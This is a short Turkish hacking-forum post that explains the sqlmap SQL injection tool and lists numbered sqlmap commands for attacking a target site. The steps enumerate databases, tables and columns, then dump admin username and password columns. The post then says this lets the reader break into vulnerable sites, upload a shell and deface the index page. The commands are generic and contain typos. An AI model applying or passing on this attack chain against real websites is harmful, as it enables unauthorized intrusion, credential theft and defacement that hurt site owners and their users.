Sqlmap Nedir Ne işe yarar

Rating - 0%
View hidden content is available for registered users!

Sql map nedir

Sqlmap python dili ile yazılmış açık kaynak kodlu,sql injection açığını tespit ve istismar eden bir araçtır.
Bu araç sizin belirtmiş olduğunuz girdiler ile hedef site üzerinde, bünyesinde bulunan kombinasyonları deneyerek açık tarar. Kali Linux işletim sistemi üzerinde hazır olarak gelen bu araç, Windows işletim sistemi ve diğer Linux işletim sistemi kullanıcılarınada açıktır. Bu tip araçları kullanmanın en güzel yanı el ile yapılan taramalardan daha hızlı sonuçlar çıkarması. Ama şunu unutmamak gerekir ki el ile yapılan taramalar her zaman daha iyi sonuçlar ortaya çıkarır.

Sql map ne işe yarar

1)Terminal satırı açılır
2)sqlmap-u hedef site adresi yazılır
3)sqlmal-u hedef site adı--dbs yazılır
4)sqlmap-u hedef site adı-D çıkan veri tabanı yazılır--tables
5)sqlmap-u hedef site adı-D çıkan veri tabanı-T çıkan tablo ismi
6)sqlmap-u hedef site adı-D çıkan veri tabanı-T çıkan tablo ismi-columns
7)sqlmap-u hedef site adı-D çıkan veri tabanı-T çıkan tablo ismi-C çıkan admin/pass kolonları yazılır
8)sqlmap-u hedef site adı-D çıkan veri tabanı-T çıkan tablo ismi-C çıkan admin/pass kolonları yazılır--dump yazarak kolon içi veriler ekrana yansıtılır...

(Bu ne işime yarar diye sorarsanız )nasıl bir hackte faydası olur neden bunu bilmemiz gerek diyorsanız

bunun size hackte değildi aşşagıda yazmış olduğum alanla faydası olacaktır arkadaşlar
Bu size sql açıklı sitelere sızıp admin kullanıcı adı ve şifresini bulmanıza yardımcı olur ve admin kullancı adı ve şifresini
öğrendikten sonra shellini index'inizi basarsınız ve mutlu son

131,568Konular
3,269,238Mesajlar
315,430Kullanıcılar
beheba6653Son Üye
Üst Alt